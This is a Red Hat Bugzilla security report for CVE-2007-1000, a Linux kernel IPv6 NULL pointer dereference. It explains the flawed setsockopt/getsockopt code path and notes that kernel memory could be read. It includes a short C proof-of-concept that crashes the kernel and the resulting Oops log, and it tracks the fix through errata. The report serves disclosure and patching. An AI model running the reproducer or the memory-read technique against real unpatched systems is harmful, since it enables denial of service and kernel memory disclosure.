Bug 232257 - CVE-2007-1000 NULL pointer hole in ipv6
CVE-2007-1000 NULL pointer hole in ipv6
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel (Show other bugs)
5.0
All Linux
medium Severity high
: ---
: ---
Assigned To: Don Howard
Martin Jenner
impact=important,source=vendorsec,rep...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2007-03-14 12:04 EDT by Marcel Holtmann
Modified: 2007-11-30 17:07 EST (History)
2 users (show)

See Also:
Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2007-04-30 12:38:01 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Marcel Holtmann 2007-03-14 12:04:06 EDT
There is a NULL pointer dereference which can lead to an arbitray kernel memory
leak, in the file net/ipv6/ipv6_sockglue.c :

340 	case IPV6_2292PKTOPTIONS:
341 	{
342 		struct ipv6_txoptions *opt = NULL;                        [1]
343 		struct msghdr msg;
344 		struct flowi fl;
345 		int junk;
346 
347 		fl.fl6_flowlabel = 0;
348 		fl.oif = sk->sk_bound_dev_if;
349 
340		if (optlen == 0)
341 			goto update;                                            [2]

377 update:
378 		retv = 0;
379 		if (inet_sk(sk)->is_icsk) {
380 			if (opt) {
...
389 			}
390 			opt = xchg(&np->opt, opt);                              [3]
391			sk_dst_reset(sk);
392		} else {
393			write_lock(&sk->sk_dst_lock);
394			opt = xchg(&np->opt, opt);                                [4]
395			write_unlock(&sk->sk_dst_lock);
396			sk_dst_reset(sk);
397		}

819	case IPV6_DSTOPTS:
820		{
821	
822			lock_sock(sk);
823			len = ipv6_getsockopt_sticky(sk, np->opt->hopopt,         [5]
824						     optval, len);
825			release_sock(sk);
826			return put_user(len, optlen);
827		}

In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and
optlen = 0 [2], np->opt is set to NULL [3][4].
In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np->opt is
dereferenced [5].

An attacker can read any portion of the kernel memory : ipv6_getsockopt_sticky()
copies np->opt->hopopt to optavl which is an user buffer, and np->opt can be
mmaped to NULL.

Here is a program that reproduces the bug :
#include <netinet/in.h>
int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen = 4;
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
  getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &optlen);
  return 0;
}

And the Oops output :
[17183522.904000] BUG: unable to handle kernel NULL pointer dereference at
virtual address 00000008
[17183522.904000]  printing eip:
[17183522.904000] f8eba4d4
[17183522.904000] *pde = 00000000
[17183522.904000] Oops: 0000 [#1]
[17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod
usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centr
ino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave
cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi
i2c_ec i2c_cor
e hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod
sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mi
i ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1
tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm
_oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc
soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 i
eee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic
thermal processor fan capability commoncap vesafb fbcon tileblit font bitbli
t softcursor
[17183522.904000] CPU:    0
[17183522.904000] EIP:    0060:[<f8eba4d4>]    Tainted: P      VLI
[17183522.904000] EFLAGS: 00210286   (2.6.17-11-386 #2) 
[17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6]
[17183522.904000] eax: 00000000   ebx: d33d1b00   ecx: d33d1f18   edx: d33d1f18
[17183522.904000] esi: 00000000   edi: 00000029   ebp: 0000003b   esp: dcd07d5c
[17183522.904000] ds: 007b   es: 007b   ss: 0068
[17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540)
[17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec
00000004 00000006 
[17183522.904000]        c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282
d33d1b00 00000000 
[17183522.904000]        d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000
f8c9a4ff 00000000 
[17183522.904000] Call Trace:
[17183522.904000]  <c025a68b> lock_sock+0xab/0xc0  <f8eba94b>
ipv6_setsockopt+0x16b/0xc40 [ipv6]
[17183522.904000]  <f8c92614> __ext3_journal_stop+0x24/0x50 [ext3]  <c0179c74>
__mark_inode_dirty+0x34/0x170
[17183522.904000]  <c013c78b> do_generic_mapping_read+0x42b/0x540  <c0154f74>
cache_alloc_refill+0x314/0x4d0
[17183522.904000]  <c0288da6> tcp_getsockopt+0x36/0x2b0  <c016f0b7>
d_alloc+0x27/0x190
[17183522.904000]  <c016f059> d_instantiate+0x49/0x80  <f8eba7e0>
ipv6_setsockopt+0x0/0xc40 [ipv6]
[17183522.904000]  <c0289966> tcp_setsockopt+0x36/0x370  <c0259de3>
sock_common_getsockopt+0x23/0x30
[17183522.904000]  <c025872e> sys_getsockopt+0x8e/0xc0  <c0259a44>
sys_socketcall+0x234/0x280
[17183522.904000]  <c02c7a00> do_page_fault+0x0/0x6e0  <c0102dbb>
sysenter_past_esp+0x54/0x79
[17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54
01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 <8b>
 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00 
[17183522.904000] EIP: [<f8eba4d4>] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP
0068:dcd07d5c
Comment 3 Don Howard 2007-03-29 17:42:07 EDT
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.
Comment 5 Mike Gahagan 2007-04-27 10:38:41 EDT
verified with 2.6.18-8.1.3.el5.
Comment 7 Red Hat Bugzilla 2007-04-30 12:38:01 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html

Note You need to log in before you can comment on or make changes to this bug.